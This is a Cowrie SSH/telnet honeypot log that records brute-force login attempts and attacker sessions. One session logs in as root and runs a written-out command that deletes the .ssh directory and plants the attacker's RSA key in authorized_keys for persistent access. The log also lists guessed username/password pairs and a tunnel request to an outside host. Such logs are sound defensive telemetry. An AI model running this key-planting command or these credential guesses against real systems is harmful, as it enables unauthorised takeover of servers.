{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:20.443050Z","src_ip":"212.227.235.229","session":"2146eea25f86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50938,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff10cb1cb0b6","protocol":"ssh","message":"New connection: 212.227.235.229:50938 (1.2.3.4:22) [session: ff10cb1cb0b6]","sensor":"my-vps","timestamp":"2025-09-09T06:02:49.875928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:02:49.882481Z","src_ip":"212.227.235.229","session":"ff10cb1cb0b6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:02:50.066901Z","src_ip":"212.227.235.229","session":"ff10cb1cb0b6"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex@2025","message":"login attempt [alex/alex@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:02:50.803770Z","src_ip":"212.227.235.229","session":"ff10cb1cb0b6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:51.996805Z","src_ip":"212.227.235.229","session":"ff10cb1cb0b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6236,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c9c67a388c","protocol":"ssh","message":"New connection: 212.227.235.229:6236 (1.2.3.4:22) [session: 59c9c67a388c]","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.131929Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.133271Z","src_ip":"212.227.235.229","session":"59c9c67a388c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6523,"dst_ip":"1.2.3.4","dst_port":22,"session":"200bab227f60","protocol":"ssh","message":"New connection: 212.227.235.229:6523 (1.2.3.4:22) [session: 200bab227f60]","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.269149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.269903Z","src_ip":"212.227.235.229","session":"200bab227f60"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.406364Z","src_ip":"212.227.235.229","session":"200bab227f60"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.817873Z","src_ip":"212.227.235.229","session":"200bab227f60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T06:02:54.955211Z","session":"200bab227f60"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:00.807388Z","src_ip":"212.227.235.229","session":"88bde03b3e59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45922,"dst_ip":"1.2.3.4","dst_port":22,"session":"53c035fab430","protocol":"ssh","message":"New connection: 212.227.235.229:45922 (1.2.3.4:22) [session: 53c035fab430]","sensor":"my-vps","timestamp":"2025-09-09T06:03:02.693798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:03:02.694972Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:03:02.773425Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.129860Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:03:03.339886Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.340711Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.341497Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.421054Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:03:03.643306Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.644053Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.725054Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.725888Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45932,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c852896e057","protocol":"ssh","message":"New connection: 212.227.235.229:45932 (1.2.3.4:22) [session: 6c852896e057]","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.805010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.805887Z","src_ip":"212.227.235.229","session":"6c852896e057"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:03:03.887090Z","src_ip":"212.227.235.229","session":"6c852896e057"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:03:04.255148Z","src_ip":"212.227.235.229","session":"6c852896e057"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.339540Z","src_ip":"212.227.235.229","session":"6c852896e057"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45940,"dst_ip":"1.2.3.4","dst_port":22,"session":"a555c2c306d9","protocol":"ssh","message":"New connection: 212.227.235.229:45940 (1.2.3.4:22) [session: a555c2c306d9]","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.417668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.418499Z","src_ip":"212.227.235.229","session":"a555c2c306d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.497208Z","src_ip":"212.227.235.229","session":"a555c2c306d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.853375Z","src_ip":"212.227.235.229","session":"a555c2c306d9"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.933841Z","src_ip":"212.227.235.229","session":"53c035fab430"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:05.935074Z","src_ip":"212.227.235.229","session":"a555c2c306d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37886,"dst_ip":"1.2.3.4","dst_port":22,"session":"64fa633220b4","protocol":"ssh","message":"New connection: 212.227.235.229:37886 (1.2.3.4:22) [session: 64fa633220b4]","sensor":"my-vps","timestamp":"2025-09-09T06:03:06.760399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:03:06.761582Z","src_ip":"212.227.235.229","session":"64fa633220b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:03:06.933748Z","src_ip":"212.227.235.229","session":"64fa633220b4"}
{"eventid":"cowrie.login.failed","username":"tunnel","password":"changeme","message":"login attempt [tunnel/changeme] failed","sensor":"my-vps","timestamp":"2025-09-09T06:03:08.417273Z","src_ip":"212.227.235.229","session":"64fa633220b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49670,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ab1c6e59e01","protocol":"telnet","message":"New connection: 212.227.125.160:49670 (1.2.3.4:23) [session: 1ab1c6e59e01]","sensor":"my-vps","timestamp":"2025-09-09T06:03:09.287425Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:09.591504Z","src_ip":"212.227.235.229","session":"64fa633220b4"}
{"eventid":"cowrie.session.closed","duration":31.26702880859375,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:40.554379Z","src_ip":"212.227.125.160","session":"1ab1c6e59e01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34410,"dst_ip":"1.2.3.4","dst_port":22,"session":"7336666f3a38","protocol":"ssh","message":"New connection: 212.227.235.229:34410 (1.2.3.4:22) [session: 7336666f3a38]","sensor":"my-vps","timestamp":"2025-09-09T06:03:41.910998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:03:41.911997Z","src_ip":"212.227.235.229","session":"7336666f3a38"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:03:42.157446Z","src_ip":"212.227.235.229","session":"7336666f3a38"}
{"eventid":"cowrie.login.failed","username":"debian","password":"0","message":"login attempt [debian/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:03:43.180686Z","src_ip":"212.227.235.229","session":"7336666f3a38"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:03:44.428955Z","src_ip":"212.227.235.229","session":"7336666f3a38"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:04.271309Z","src_ip":"212.227.235.229","session":"200bab227f60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60678,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ab4d35a178a","protocol":"ssh","message":"New connection: 212.227.235.229:60678 (1.2.3.4:22) [session: 3ab4d35a178a]","sensor":"my-vps","timestamp":"2025-09-09T06:04:10.091437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:10.092628Z","src_ip":"212.227.235.229","session":"3ab4d35a178a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:10.173207Z","src_ip":"212.227.235.229","session":"3ab4d35a178a"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:10.496828Z","src_ip":"212.227.235.229","session":"3ab4d35a178a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:11.580297Z","src_ip":"212.227.235.229","session":"3ab4d35a178a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60114,"dst_ip":"1.2.3.4","dst_port":22,"session":"99053c8dd3f1","protocol":"ssh","message":"New connection: 212.227.235.229:60114 (1.2.3.4:22) [session: 99053c8dd3f1]","sensor":"my-vps","timestamp":"2025-09-09T06:04:11.740180Z"}
